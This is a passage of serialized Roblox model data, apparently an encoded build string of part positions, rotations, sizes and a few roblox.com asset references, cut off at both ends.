0,1,0,1,-0.0001,-0.00'
- ..'01,0,0,-1,0,1,0|-71.4623,12143.0283,-338.7603|2,7.2,3|-70.155,12141.0146,-343.7603|28.1299,20.3099,38.1399|2,12,1|-72.0601,12052.0839,-357.2602|-75.0602,12052.0859,-357.2603|-70.0604,12111.0761,-348.2603|0,-0.0157,0|-70.0604,12111.0849,-339.2603|-70.1551,12141.0146,-333.7603|29.0699,158.8399,141.46|-74.0601,12052.0839,-357.2602|-81.0562,12052.0849,-357.2603|-77.0602,12052.0859,-357.2603|-79.0602,12052.0859,-357.2603|-83.0602,12052.0859,-357.2603|-84.5604,12052.0859,-358.7603|-90.0602,12052.0849,-357.2604|-84.5603,12057.5898,-357.2603|-84.5604,12058.5869,-348.2603|-84.56,12046.5869,-348.2603|-92.0604,12052.0859,-339.2603|-88.0602,12052.0849,-357.2603|-81.0563,12052.0849,-339.2603|-97.0602,12052.0849,-357.2604|-95.0602,12052.0849,-357.2604|-86.0602,12052.0849,-357.2603|-99.0602,12052.0849,-357.2604|-84.5602,12052.0849,-357.7603|-83.0604,12052.0859,-339.2603|-94.0602,12052.0849,-357.2604|-97.0604,12052.0849,-339.2604|-90.0604,12052.0859,-339.2603|-92.0602,12052.0849,-357.2604|-94.0604,12052.0859,-339.2603|-88.0604,12052.0859,-339.2603|-84.5604,12052.0859,-337.7603|-99.0604,12052.0849,-339.2604|-95.0604,12052.0849,-339.2604|-84.5604,12052.0859,-338.7603|-84.5604,12057.5869,-339.2603|-86.0604,12052.0859,-339.2603|-66.0602,12052.0849,-339.2603|-64.5602,12052.0849,-338.7603|-68.0643,12052.0839,-339.2603|-63.0602,12052.0849,-339.2603|-77.0604,12052.0859,-339.2603|-74.0602,12052.0849,-339.2603|-64.5601,12052.0849,-337.7603|-75.0604,12052.0859,-339.2603|-79.0604,12052.0859,-339.2603|-53.0602,12052.5859,-338.7602|-59.0602,12052.0849,-339.2602|-70.0602,12052.0849,-339.2603|-52.5602,12052.0849,-332.7604|-57.0602,12052.0849,-339.2602|-72.0602,12052.0849,-339.2603|-61.0602,12052.0849,-339.2602|-52.5602,12052.0849,-334.7604|-55.0602,12052.0859,-339.2602|-52.5602,12052.0849,-336.7604|-103.0602,12052.0849,-357.2604|-104.5604,12052.0859,-358.7603|-101.0562,12052.0839,'
- ..'-357.2604|-104.5603,12057.5898,-357.2603|-104.5602,12052.0849,-357.7604|-104.56,12046.5869,-348.2603|-103.0604,12052.0849,-339.2604|-101.0563,12052.0839,-339.2604|-104.5604,12058.5869,-348.2603|-106.0602,12052.0849,-357.2604|-106.0603,12052.0849,-339.2604|-104.5604,12057.5869,-339.2603|-104.5603,12052.0849,-337.7604|-104.5604,12052.0849,-338.7603|-108.0602,12052.0849,-357.2604|-108.0603,12052.0849,-339.2604|-119.0602,12052.0849,-357.2604|-115.0602,12052.0849,-357.2604|-112.0603,12052.0849,-339.2604|-110.0602,12052.0849,-357.2604|-114.0602,12052.0849,-357.2604|-117.0602,12052.0849,-357.2604|-114.0603,12052.0849,-339.2604|-112.0602,12052.0849,-357.2604|-115.0604,12052.0839,-339.2604|-117.0604,12052.0839,-339.2604|-110.0603,12052.0849,-339.2604|-166.0604,12052.8857,-380.7603|-0.5,-0.2,-31.5,1,-0,-0,0,0,1,0,-1,-0|-167.0604,12052.8857,-379.7603|0.5,0.1999,31.5,1,0,0,-0,-0,-1,0,1,0|-135.0604,12052.8857,-366.7603|-31.5,0.1999,18.5,-0,1,0,0,0,-1,-1,0,0|-128.0602,12052.0839,-357.2604|-132.0602,12052.0839,-357.2604|-130.0602,12052.0839,-357.2604|-134.0602,12052.0839,-357.2604|-124.5603,12052.0849,-358.7604|-123.0602,12052.0839,-357.2604|-126.0602,12052.0839,-357.2604|-124.5602,12052.0839,-357.7604|-124.5603,12057.5888,-357.2604|-124.5604,12058.5859,-348.2604|-121.0562,12052.0839,-357.2604|-166.5604,12046.2851,-348.2603|-124.5604,12057.5859,-339.2604|-124.56,12046.5859,-348.2604|-134.0603,12052.0839,-339.2604|-132.0603,12052.0839,-339.2604|-130.0603,12052.0839,-339.2604|-124.5604,12052.0839,-338.7604|-121.0563,12052.0839,-339.2604|-123.0604,12052.0839,-339.2604|-124.5603,12052.0839,-337.7604|-128.0603,12052.0839,-339.2604|-126.0603,12052.0839,-339.2604|-119.0604,12052.0839,-339.2604|-164.1075,12049.499,-335.7708|-165.1087,12049.499,-333.7714|-163.1072,12049.2041,-335.7721|-167.1075,12049.499,-335.7725|0,-0.6001,1.5,-1,0,0,-0.0001,-0.0001,1,0,0.9999,-0.0001|-16'
- ..'5.1063,12049.499,-337.7714|-165.608,12053.0986,-335.7715|-166.5604,12059.4853,-348.2603|-18,6.3999,31.5,-0,-1,-0,-0,-0,-1,1,0,0|18.5,6.3999,31.5,-0,-1,-0,-0,-0,-1,1,0,0|-0.5,6.3999,-31.5,-1,-0,-0,-0,-0,-1,-0,-1,-0|-0.5,6.3999,-31.5,1,0,0,-0,-0,-1,0,1,0|-165.5604,12046.6855,-348.2603|3,0.5999,11.5,-1,0,0,0,0,-1,0,-1,0|3,2,6.5,-1,0,0,0,0,-1,0,-1,0|-3,2,6.5,-1,0,0,0,0,-1,0,-1,0|-170.5604,12047.8857,-348.2603|0,0.2,0,1,0,0,0,0,-1,0,1,0|-157.0604,12048.6855,-355.2603|-157.0604,12048.6855,-341.2603|-155.0604,12048.6855,-337.2603|-155.0604,12048.6855,-360.2603|-170.5604,12047.4853,-348.2603|-145.0604,12054.0849,-352.7603|-150.0604,12054.0849,-352.7603|-146.5604,12054.0849,-352.7603|-148.3604,12049.4853,-346.2603|-146.0604,12050.5849,-356.2603|-152.0604,12050.5849,-361.8603|0,2.6,1,1,0,0,0,-1,0,0,0,-1|-145.0604,12054.0849,-343.7603|-147.0604,12050.5849,-356.2603|0,0,0.5,1,0,0,0,-1,0,-0,-0,-1|-155.0604,12050.4853,-352.7603|0.0999,-6,-1.5,0,-1,0,0,0,1,-1,0,0|1,-0.0001,10,0,0,-1,0,1,0,1,0,0|-149.5604,12050.5849,-356.2603|-153.5604,12050.5849,-359.2603|-158.5604,12050.5849,-359.2603|-0.5,0.0999,3.5,0,0,1,-1,0,0,0,-1,0|3,-0.6,1,1,0,0,-0,0,1,0,-1,0|-145.9604,12049.4853,-346.2603|-151.0604,12049.4853,-350.2603|-146.5604,12054.0849,-343.7603|-157.5604,12049.4853,-355.2603|-154.0604,12049.4853,-351.2603|-148.3604,12049.4853,-350.2603|0.5,-1.0001,-6.7001,0,0,-1,1,0,0,0,-1,0|-145.9604,12049.4853,-350.2603|-155.5604,12049.4853,-360.2603|-151.0604,12049.4853,-346.2603|-159.0604,12048.8857,-351.2603|-150.0604,12054.0849,-343.7603|-146.0604,12050.5849,-340.2603|-154.0604,12047.4853,-351.2603|-147.0604,12050.5849,-340.2603|-154.0604,12047.4853,-345.2603|-159.0604,12047.4853,-348.2603|-159.0604,12049.2851,-348.2603|0.5,-0.2,2,0,0,-1,0,1,0,1,0,0|-154.0604,12049.4853,-345.2603|-149.5604,12050.5849,-340.2603|-0.5,-3.5,0.5,0,0,1,1,0,0,0,1,0|-155.0604,12050.4853,-343.7603|-0.1,-'
- ..'6,3.5,0,1,0,0,0,1,1,0,0|-165.0604,12048.4853,-351.2603|-165.0604,12050.4853,-351.2603|-159.0604,12048.8857,-345.2603|-157.5604,12049.4853,-341.2603|-167.0604,12049.6855,-348.2603|-153.5604,12050.5849,-337.2603|-152.0604,12050.5849,-334.6603|-170.5604,12050.4853,-349.7603|-165.0604,12050.4853,-345.2603|0,-1.6,2.5,1,0,0,0,-1,0,0,0,-1|-170.5604,12047.6855,-349.7603|-170.5604,12048.8857,-349.7603|1,-0.4001,-5.5,0,0,-1,0,-1,0,-1,0,0|0,-0.4001,0,-0,-1,0,-0,0,1,-1,0,0|-155.5604,12049.4853,-337.2603|-0.5,0,3,0,0,1,0,1,0,-1,0,0|-165.0604,12048.4853,-345.2603|-5.5,-2,-0.5,-1,0,0,0,-1,0,0,0,1|-158.5604,12050.5849,-337.2603|-170.5604,12050.4853,-346.7603|-170.5604,12047.6855,-346.7603|-170.5604,12048.8857,-346.7603|-170.5604,12051.2851,-348.2603|-174.0604,12049.4853,-348.2603|47.9396,12052.8857,-329.7603|-11.7827,12130.5869,-326.0584|-20.07,-84.09,-4.39|-12.0242,12130.8134,-327.6141|-18.4,-72.5101,-12.9|-12.0228,12130.8115,-322.9125|-18.41,-107.4401,12.8699|-11.7822,12130.5869,-324.4681|-20.07,-95.8601,4.3499|-13.3783,12139.1572,-325.2598|0,180,-133.2|2,2,2|0.5,0.5,0.5|-12.494,12131.2548,-321.4596|-15.2,-118.49,20.76|-13.1751,12131.8935,-320.1727|-10.65,-128.8201,27.77|-12.4962,12131.2548,-329.067|-15.1801,-61.4701,-20.7901|-17.0604,12122.5849,-321.7603|1,5,1|-20.5604,12119.0849,-325.2603|8,2,8|-20.5602,12122.5849,-328.2606|6,5,1|-17.5602,12122.5849,-325.2605|-17.0604,12122.5849,-328.7603|-18.3569,12134.622,-321.3395|8.26,-172.03,43.7599|-18.9061,12134.0478,-325.2598|16.2,18.03,-40.6101|42.9099,81.9,-5.5301|-21.2039,12137.2958,-324.8445|54.2799,100.2399,7.13|42.8899,98.3099,5.6799|23.76,27.9599,-37.2001|-20.8389,12136.9531,-327.2158|46.5699,44.6599,-29.7901|-20.4882,12136.624,-327.8796|40.08,31.1299,-36.7201|-19.5272,12135.7216,-328.8395|24.7299,9.84,-43.48|30.61,39.06,-32.1101|40.6399,66.0699,-16.1201|-22.1003,12140.2744,-329.054|56.13,34.4599,-37.7901|40.59,1'
- ..'14.1299,16.25|-20.5601,12122.5849,-322.2607|-20.835,12136.9501,-323.2945|46.49,135.5299,29.8999|-17.7703,12134.0712,-329.0951|0.34,-16.5,-42.0401|-21.2048,12137.2958,-325.6644|54.2999,80.0199,-6.95|-18.3647,12134.6298,-329.18|8.3599,-7.8601,-43.78|-0.0701,-179.92,43.2|-18.959,12135.1884,-329.0936|16.5599,0.79,-44.3|-21.0814,12137.1806,-326.4665|51.5499,60.9799,-19.8|0.0399,0.0399,-43.2001|36.3199,128.4799,25.2099|36.3899,51.7,-25.1001|-21.0789,12137.1787,-324.0429|51.5,119.25,19.95|-18.9514,12135.1806,-321.4238|16.45,179.32,44.2999|8.1099,171.27,42.58|-20.0445,12136.208,-328.4289|32.6699,19.76,-41.0901|8.22,8.85,-42.5601|-22.5605,12127.9882,-323.2598|40,130,0|-22.5659,12140.7119,-322.8993|62.0299,127.5599,26.94|-18.5605,12127.9882,-323.2598|40,-130,0|-20.5606,12130.788,-325.2598|4,1,4|-18.0605,12127.288,-322.7598|2,0.4,2|-18.0602,12127.2871,-327.7606|-23.0602,12127.288,-327.7604|-20.5604,12126.0849,-325.2603|-2.5,3.9999,-4,1,0,0,0,1,0,0,0,1|-22.5705,12140.7158,-327.6005|62.0999,52.7099,-26.7601|-20.5606,12129.788,-325.2598|-22.5606,12127.9882,-327.2598|0.15,141.7299,40.15|-22.8101,12140.9404,-326.0446|65.6399,76.6699,-9.86|-22.0928,12140.2666,-321.4476|56.04,145.75,37.9|-21.4097,12139.6259,-320.1631|48.74,159.4299,44.09|-18.5602,12127.9873,-327.2606|-40,140,0|-22.8085,12140.9384,-324.4543|65.62,103.6699,10.1099|-23.0605,12127.288,-322.7598|-17.0604,12111.0849,-321.7603|-17.2019,12133.538,-328.8424|-7.33,-25.4401,-39.1|-16.14,-17.9501,-40.6301|-20.0382,12136.2011,-322.0844|32.5699,160.38,41.1399|-36.3601,-128.3601,25.1399|-30.58,-140.9901,32.13|-23.73,-152.0801,37.22|-15.6445,12132.0751,-326.4733|-29.5401,-69.59,-14.1001|-40.62,-114,16.1599|-20.483,12136.6181,-322.632|39.99,149.0299,36.79|-15.52,12131.9589,-325.6714|-31.49,-83.07,-4.8401|-42.9001,-81.7601,-5.6301|-40.6101,-65.9401,-16.21|-23.7001,-27.8701,-37.2401|-16.684,12133.0517,-328.433|-14.4201'
- ..',-35,-34.9001|16.1,162.0899,40.6399|-16.6818,12133.0498,-322.0887|-14.45,-144.95,34.88|-15.8866,12132.3037,-323.3007|-25.8601,-122.9801,22.34|-16.2377,12132.6337,-322.6373|-20.72,-134.5,29.3099|30.53,141.0899,32.1899|-15.5197,12131.958,-324.8516|-31.49,-96.8701,4.7899|-42.9001,-98.17,5.5799|-36.3401,-51.5801,-25.1701|23.67,152.1699,37.25|-30.56,-38.96,-32.16|-15.8879,12132.3037,-327.222|-25.8501,-56.9701,-22.38|-19.5201,12135.7148,-321.6757|24.62,170.2799,43.5|-16.2396,12132.6337,-327.8849|-20.7001,-45.4501,-29.3401|-15.6437,12132.0751,-324.0497|-29.56,-110.35,14.06|-8.15,-8.7701,-42.57|-8.1801,-171.1901,42.56|-17.0601,12111.0634,-330.2595|0.1,0,0|0.001,-0.0003,0.0018|-20.5606,12131.288,-325.2598|4,4,4|-17.1994,12133.5361,-321.6786|-7.3601,-154.5201,39.09|-16.1701,-162.01,40.6199|-19.5605,12132.788,-325.2598|0,180,46.7999|1.5,1.5,1.5|-17.7676,12134.0693,-321.4252|0.3,-163.4701,42.0299|-23.5602,12122.5849,-325.2606|-24.0604,12122.5849,-328.7603|-24.5601,12104.5517,-329.2707|0,-90,-0.1001|-24.0604,12122.5849,-321.7603|1,0.5,-4,1,0,0,0,1,0,0,0,1|-23.5605,12128.0888,-325.2598|-1.1001,-10,0|0.5,5,0.5|-28.5604,12123.7851,-324.5103|-28.5604,12122.0849,-322.7603|0,0,-4,-1,-0,-0,0,1,0,-0,-0,-1|-4,3,2.5,0,0,1,0,1,0,-1,0,0|-30.0604,12118.5849,-326.2603|-1.5,-3.5,1.5,0,0,1,0,1,0,-1,-0,-0|-28.5604,12121.3847,-324.7603|89.97,0,0|-25.5619,12111.0615,-321.7581|0.1199,90,0.0299|0.0014,0.0005,0.0004|-34.0604,12122.4853,-321.0603|-34.0604,12120.2851,-323.7603|-34.0604,12123.9853,-321.4603|-89.9701,-90.4801,-89.52|1.2999,1.8995,4,-0.0001,1,-0.0001,0.9999,0,0,0,-0.0001,-1|-34.0604,12119.2851,-322.2603|-34.5602,12052.0859,-330.7602|-34.5602,12052.0849,-323.7563|-34.0602,12052.0859,-327.2602|-34.5602,12052.0859,-328.7602|-34.5604,12057.5908,-327.2602|-34.5602,12052.0859,-325.7602|-33.0602,12052.0859,-327.2604|-34.5604,12111.0849,-321.7603|-38.0604,12119.2851,-322.2603|-2,'
- ..'-0.5,0,0,1,0,0,0,1,1,0,0|-38.0604,12122.4853,-321.0603|-36.0604,12120.9853,-322.2603|0,-1.2,-2,0,1,0,-0,-0,1,1,0,0|-38.0604,12118.5849,-325.7603|-38.0604,12123.9853,-321.4603|-43.5604,12104.4853,-329.2603|-43.5604,12111.0761,-321.7603|0,-0.0111,0|-43.0604,12118.5849,-328.7603|1,1,37|-52.5604,12111.0849,-321.7603|-62.5525,12104.5517,-329.2547|0.1,-90,0|-61.5615,12111.0634,-321.7581|-0.1001,90.01,0|0.005,-0.0059,-0.0004|-70.0607,12111.0634,-330.2598|-0.0001,-0.0154,0.0054|-70.0604,12111.0849,-321.7603|-53.0602,12052.0849,-327.2604|-54.0602,12052.0849,-327.2604|-52.5602,12052.0849,-323.7565|-52.5602,12052.0849,-328.7604|-52.5602,12052.0849,-330.7604|-52.5604,12057.5878,-327.2603|-43.5601,12046.5869,-327.7602|-52.5602,12052.0849,-325.7604|-43.5604,12058.5888,-327.2602|-135.0604,12052.8857,-330.2603|79.9396,12052.8857,-316.7603|0.5,0.1999,31.5,1,0,0,0,0,-1,0,1,0|78.9396,12052.8857,-315.7603|-14.0365,12132.7021,-319.1084|-4.9801,-138.4101,33.77|-18.439,12136.8369,-317.8186|24.45,-171.9101,47.3699|-17.2858,12135.7529,-317.6552|16.42,-163.79,45.5299|-20.5471,12138.8154,-319.1003|40.8199,170.32,47.0999|-19.5422,12137.872,-318.3074|32.6399,179.6199,48|-15.0405,12133.6455,-318.313|1.57,-147.3201,38.72|-16.143,12134.6806,-317.8216|8.7899,-155.73,42.65|-34.5602,12052.0859,-312.7602|-34.5602,12052.0859,-308.7602|-33.0602,12052.0859,-307.2604|-34.5602,12052.0859,-314.7602|-34.5604,12057.5908,-307.2602|-34.5602,12052.0859,-305.7602|-34.5602,12052.0859,-310.7602|-34.5602,12052.0849,-303.7562|-34.0602,12052.0859,-307.2602|-34.5602,12052.0859,-316.7602|-34.5602,12052.0859,-321.7602|-34.5602,12052.0859,-319.7602|-34.5602,12052.0859,-317.7602|-167.0604,12052.8857,-315.7603|-166.0604,12052.8857,-316.7603|-0.5,0.1999,-31.5,-1,-0,0,0,0,-1,-0,-1,0|-52.5602,12052.0849,-312.7604|-53.0602,12052.0849,-307.2604|-52.5604,12057.5878,-307.2603|-52.5602,12052.0849,-305.7604|-52.5602'
- ..',12052.0849,-308.7604|-52.5602,12052.0849,-310.7604|-54.0602,12052.0849,-307.2604|-52.5602,12052.0849,-316.7604|-52.5602,12052.0849,-314.7604|-52.5602,12052.0849,-319.7604|-52.5602,12052.0849,-317.7604|-52.5602,12052.0849,-321.7604|-135.0604,12052.8857,-302.7603|-43.5601,12046.5859,-306.7602|-52.5602,12052.0839,-303.7564|-43.5604,12046.4853,-73.7603|-90,0,0|247,243,1|0,-122.7,25.4999,0,1,0,1,0,0,0,0,-1|25.4999,119.4996,69.5,0,0,-1,0,1,0,1,0,0|0,-122.7001,25.4999,0,-1,0,-1,0,0,0,0,-1|116.9998,-25.5001,-20.5,0,1,0,0,0,1,1,0,0|0,121.5,0,-1,-0,-0,0,0,1,0,1,0|9.9999,-0.1021,0.0001,0,-0.0001,-1,0,0.9999,-0.0001,0.9999,-0.0001,0|25.4999,119.4998,-70,0,0,-1,0,1,0,1,0,0|0.5,-0.5,119.5,-1,0,-0,0,0,1,-0,1,-0|117,-25.5,19.5,0,1,0,0,0,1,1,0,0|-166.2604,12072.4853,-73.7603|243,0.4,51|79.1396,12072.4853,-73.7603|-164.1075,12049.499,-271.7708|-165.1087,12049.499,-269.7714|-163.1072,12049.2041,-271.7721|-165.1063,12049.499,-273.7714|-167.1075,12049.499,-271.7725|-165.608,12053.0986,-271.7715|-0.5,3,-1.9999,0,-1,0,-0.0001,-0.0001,-1,0.9999,0,-0.0001|-117.0602,12052.0839,-295.2604|-115.0602,12052.0839,-295.2604|-114.0602,12052.0849,-295.2604|-104.5601,12046.5869,-286.2603|-94.0602,12052.0849,-295.2603|-92.0602,12052.0849,-295.2603|-95.0602,12052.0849,-295.2604|-84.5604,12057.5888,-295.2603|-84.5604,12058.5869,-286.2603|-86.0602,12052.0849,-295.2603|-90.0602,12052.0849,-295.2603|-97.0602,12052.0849,-295.2604|-88.0602,12052.0849,-295.2603|-104.5602,12052.0849,-295.7604|-103.0602,12052.0849,-295.2604|-101.0562,12052.0839,-295.2604|-104.5604,12057.5878,-295.2603|-108.0602,12052.0849,-295.2604|-110.0602,12052.0849,-295.2604|-112.0602,12052.0849,-295.2604|-104.5604,12058.5869,-286.2603|-99.0602,12052.0849,-295.2604|-106.0602,12052.0849,-295.2604|-104.5604,12052.0859,-296.7603|-124.5604,12058.5859,-286.2604|-77.0602,12052.0859,-295.2603|-84.5601,12046.5869,-286.2603|-59.0601'
- ..',12052.0849,-295.2603|-128.0602,12052.0839,-295.2604|-132.0602,12052.0839,-295.2604|-64.5601,12052.0849,-295.7603|-124.5601,12046.5859,-286.2604|-134.0602,12052.0839,-295.2604|-124.5602,12052.0839,-295.7604|-57.0601,12052.0849,-295.2603|-64.5601,12052.0849,-296.7602|-126.0602,12052.0839,-295.2604|-84.5602,12052.0849,-295.7603|-79.0602,12052.0849,-295.2603|-84.5604,12052.0859,-296.7603|-61.0601,12052.0849,-295.2603|-64.5604,12058.5878,-286.2603|-63.0601,12052.0849,-295.2602|-55.0601,12052.0849,-295.2602|-119.0602,12052.0839,-295.2604|-124.5604,12052.0839,-296.7604|-121.0562,12052.0839,-295.2604|-123.0602,12052.0839,-295.2604|-130.0602,12052.0839,-295.2604|-124.5604,12057.5878,-295.2604|-64.5604,12057.5878,-295.2603|-66.0601,12052.0849,-295.2602|-72.0601,12052.0839,-295.2603|-74.0601,12052.0839,-295.2603|-70.0601,12052.0839,-295.2602|-68.0641,12052.0839,-295.2602|-83.0602,12052.0849,-295.2603|-81.0562,12052.0849,-295.2603|-75.0602,12052.0859,-295.2603|-166.5604,12046.2851,-284.2603|-115.0604,12052.0839,-277.2604|-104.5604,12052.0839,-275.7604|-117.0604,12052.0839,-277.2604|-104.5604,12052.0839,-276.7603|-104.5604,12057.5869,-277.2603|-103.0604,12052.0839,-277.2604|-97.0604,12052.0839,-277.2604|-108.0604,12052.0839,-277.2604|-106.0604,12052.0839,-277.2604|-112.0604,12052.0839,-277.2604|-101.0565,12052.0839,-277.2604|-94.0604,12052.0859,-277.2603|-88.0604,12052.0859,-277.2603|-110.0604,12052.0839,-277.2604|-99.0604,12052.0839,-277.2604|-95.0604,12052.0839,-277.2604|-92.0604,12052.0859,-277.2603|-90.0604,12052.0859,-277.2603|-119.0604,12052.0839,-277.2604|-114.0604,12052.0839,-277.2604|-126.0604,12052.0839,-277.2604|-84.5604,12052.0859,-275.7603|-84.5604,12052.0859,-276.7603|-83.0604,12052.0859,-277.2603|-84.5604,12057.5869,-277.2603|-81.0565,12052.0849,-277.2603|-77.0604,12052.0859,-277.2603|-79.0604,12052.0859,-277.2603|-52.5604,12057.5878,-265.2603|-5'
- ..'7.0602,12052.0849,-277.2603|-130.0604,12052.0839,-277.2604|-128.0604,12052.0839,-277.2604|-59.0602,12052.0849,-277.2603|-86.0604,12052.0859,-277.2603|-75.0604,12052.0859,-277.2603|-55.0602,12052.0849,-277.2602|-63.0602,12052.0849,-277.2603|-66.0602,12052.0849,-277.2603|-64.5601,12052.0849,-275.7603|-61.0602,12052.0849,-277.2603|-64.5602,12052.0849,-276.7603|-64.5605,12057.5898,-277.2603|-124.5604,12052.0839,-275.7604|-135.0604,12052.8857,-266.2603|-123.0604,12052.0839,-277.2604|-124.5604,12052.0839,-276.7604|-124.5604,12057.5859,-277.2604|-132.0604,12052.0839,-277.2604|-134.0604,12052.0839,-277.2604|-72.0602,12052.0849,-277.2603|-70.0602,12052.0849,-277.2603|-68.0643,12052.0839,-277.2603|-121.0564,12052.083,-277.2604|-74.0602,12052.0849,-277.2603|-166.0604,12052.8857,-252.7603|-52.5604,12057.5878,-245.2603|-54.0602,12052.0859,-245.2604|-52.5605,12057.5878,-225.2603|-52.5605,12057.5878,-205.2603|-54.0603,12052.0859,-225.2604|-54.0603,12052.0859,-205.2604|-10.5,121.5001,5.5997,-1,0,-0.0001,0,0,-1,-0.0001,-1,-0.0001|-110.5604,12072.4853,-195.4603|-52.0604,12072.5849,-194.7605|-165.5604,12046.6855,-284.2603|-170.5604,12047.8857,-284.2603|-157.0604,12048.6855,-291.2603|-157.0604,12048.6855,-277.2603|-155.0604,12048.6855,-273.2603|-155.0604,12048.6855,-296.2603|-170.5604,12047.4853,-284.2603|-145.0604,12054.0849,-288.7603|-150.0604,12054.0849,-288.7603|-3.5,-3,-0.5,-0,-1,0,-0,0,1,-1,0,0|-146.5604,12054.0849,-288.7603|-148.3604,12049.4853,-282.2603|-146.0604,12050.5849,-292.2603|-152.0604,12050.5849,-297.8603|0,2.6,1,1,0,-0,0,-1,-0,0,0,-1|-145.0604,12054.0849,-279.7603|-147.0604,12050.5849,-292.2603|-155.0604,12050.4853,-288.7603|0.0999,-6,3.5,0,-1,0,0,0,1,-1,0,0|-149.5604,12050.5849,-292.2603|-153.5604,12050.5849,-295.2603|-158.5604,12050.5849,-295.2603|1,-0.6,-4,1,0,0,-0,0,1,0,-1,0|-145.9604,12049.4853,-282.2603|0.5,-1.0001,9.0999,0,0,-1,-1,0,0,0,1,0|-15'
- ..'1.0604,12049.4853,-286.2603|-146.5604,12054.0849,-279.7603|-157.5604,12049.4853,-291.2603|-154.0604,12049.4853,-287.2603|-148.3604,12049.4853,-286.2603|-145.9604,12049.4853,-286.2603|-155.5604,12049.4853,-296.2603|0.5,1,3,0,0,-1,0,-1,0,-1,0,0|-151.0604,12049.4853,-282.2603|-159.0604,12048.8857,-287.2603|0.5,-1.6,4,0,0,-1,0,-1,0,-1,0,0|-150.0604,12054.0849,-279.7603|-146.0604,12050.5849,-276.2603|-154.0604,12047.4853,-287.2603|-147.0604,12050.5849,-276.2603|-154.0604,12047.4853,-281.2603|-159.0604,12047.4853,-284.2603|1,0.9999,6,0,0,-1,0,-1,0,-1,0,0|-159.0604,12049.2851,-284.2603|-1,-0.8001,6,0,0,1,0,-1,0,1,0,0|1,-0.8001,6,0,0,-1,0,-1,0,-1,0,0|-154.0604,12049.4853,-281.2603|-149.5604,12050.5849,-276.2603|-155.0604,12050.4853,-279.7603|-165.0604,12048.4853,-287.2603|-165.0604,12050.4853,-287.2603|0.5,0,10,0,0,-1,0,1,0,1,0,0|-159.0604,12048.8857,-281.2603|-157.5604,12049.4853,-277.2603|-167.0604,12049.6855,-284.2603|-153.5604,12050.5849,-273.2603|-152.0604,12050.5849,-270.6603|-170.5604,12050.4853,-285.7603|1,-2.0001,-5.5,0,0,-1,0,-1,0,-1,0,0|-165.0604,12050.4853,-281.2603|-170.5604,12047.6855,-285.7603|-170.5604,12048.8857,-285.7603|-155.5604,12049.4853,-273.2603|-165.0604,12048.4853,-281.2603|-158.5604,12050.5849,-273.2603|-170.5604,12050.4853,-282.7603|-170.5604,12047.6855,-282.7603|-170.5604,12048.8857,-282.7603|-170.5604,12051.2851,-284.2603|-174.0604,12049.4853,-284.2603|-43.5604,12098.5849,-73.7603|-121,25.4991,-8.5003,0,1,0,0,0,-1,-1,0,0|-120.9999,21.4971,-0.0004,0,1,0,0,0,-1,-1,0,0|-121.0003,25.4999,8.5006,0,1,-0.0001,0,-0.0001,-1,-1,0,-0.0001|-166.5604,12059.4853,-284.2603|Lower|-51.0604,12064.9853,45.7397|3,2,2|-53.0604,12065.4853,45.7397|Upper|-39.0604,12065.4853,45.7397|3,1,2|http://www.roblox.com/asset/?id=35637606|-41.0604,12066.4853,45.7397|-33.0604,12065.4853,45.7397|-31.0604,12065.4853,45.7397|-29.0604,12066.4853,45.7397|-33.0604,1206'
- ..'6.4853,45.7397|-29.0604,12061.9853,45.7397|1,8,4|0.0705,0.9333,0.8313|0.15|0.75|-35.0604,12060.9882,45.7397|-37.0604,12061.4853,45.7397|1,7,2|-43.0604,12060.9882,45.7397|-45.0604,12061.4853,45.7397|-55.0604,12061.4853,45.7397|3,7,2|-57.0604,12061.9853,45.7397|-29.0604,12070.4853,45.7397|-47.0604,12070.9873,45.7397|-31.0604,12070.9853,45.7397|3,6,2|-47.0604,12066.9853,45.7397|http://www.roblox.com/asset/?id=35890566|-39.0604,12070.9873,45.7397|-35.0604,12070.4853,45.7397|-41.0604,12070.4853,45.7397|-39.0604,12066.9853,45.7397|-37.0604,12070.4853,45.7397|-31.0604,12066.9853,45.7397|-45.0604,12070.4853,45.7397|-30.0604,12072.4853,47.2397|1,3,3|-33.0604,12070.4853,45.7397|-51.0604,12070.4853,45.7397|-43.0604,12070.4853,45.7397|-30.0604,12072.4853,44.2397|-55.0604,12070.9853,45.7397|-49.0604,12070.4853,45.7397|26.4396,12072.4853,45.7396|51,4,105|-63.0604,12072.4853,43.2397|1,51,10|-43.0604,12078.9853,47.2397|29,10,1|-43.0604,12084.4853,45.7397|33,1,4|-43.0604,12078.9853,44.2397|-56.0604,12072.4853,47.2397|0,1,1|0.25|-43.0604,12074.4853,45.7397|29,1,2|-56.0604,12072.4853,44.2397|-57.0604,12070.4853,45.7397|-53.0604,12070.4853,45.7397|-113.0604,12072.4853,45.7393|51,4,106|-43.0604,12091.4853,45.7397|13,4,33|-23.0604,12072.4853,43.2396|-47.0604,12061.4853,45.7397|-41.0604,12061.4853,45.7397|-53.0604,12061.4853,45.7397|-49.0604,12061.4853,45.7397|-39.0604,12061.4853,45.7397|-33.0604,12061.4853,45.7397|-31.0604,12061.4853,45.7397|-51.0604,12060.9882,45.7397|Approachable|-43.0604,12057.4853,45.7397|-43.0604,12052.9853,47.2397|1,29,10|-43.0604,12052.9853,44.2397|-43.0604,12047.4853,45.7397|-35.0604,12066.4853,45.7397|-37.0604,12065.4853,45.7397|-35.0604,12064.9853,45.7397|-55.0604,12066.9853,45.7397|-47.0604,12065.4853,45.7397|-45.0604,12065.4853,45.7397|-27.5604,12065.9853,45.7397|2,36,4|-43.0604,12066.4853,45.7397|-49.0604,12066.4853,45.7397|-53.0604,12066.48'
- ..'53,45.7397|-55.0604,12065.4853,45.7397|-43.0604,12064.9853,45.7397|-57.0604,12066.4853,45.7397|-37.0604,12066.4853,45.7397|-45.0604,12066.4853,45.7397|-41.0604,12065.4853,45.7397|-51.0604,12066.4853,45.7397|-58.5604,12065.9853,45.7397|-49.0604,12065.4853,45.7397;0,4>11>2,4>12>7,5>11>2,5>12>4046,6>11>2,6>12>302,8>13>10,9>13>10,15>11>10,15>12>254,16>11>10,16>12>173,17>11>10,17>12>164,21>11>19,21>12>147,50>11>48,50>12>252,53>11>51,53>12>159,64>11>62,64>12>18,89>13>128,92>11>90,92>12>96,95>11>93,95>12>96,103>11>101,103>12>111,104>11>101,104>12>96,105>11>101,105>12>113,110>11>108,110>12>144,115>11>113,115>12>164,116>11>113,116>12>96,117>11>113,117>12>120,118>11>113,118>12>93,119>11>113,119>12>90,122>11>120,122>12>111,123>11>120,123>12>93,126>11>124,126>12>113,127>11>124,127>12>106,130>11>128,130>12>159,131>11>128,131>12>147,132>11>128,132>12>124,133>11>128,133>12>113,136>11>134,136>12>99,139>11>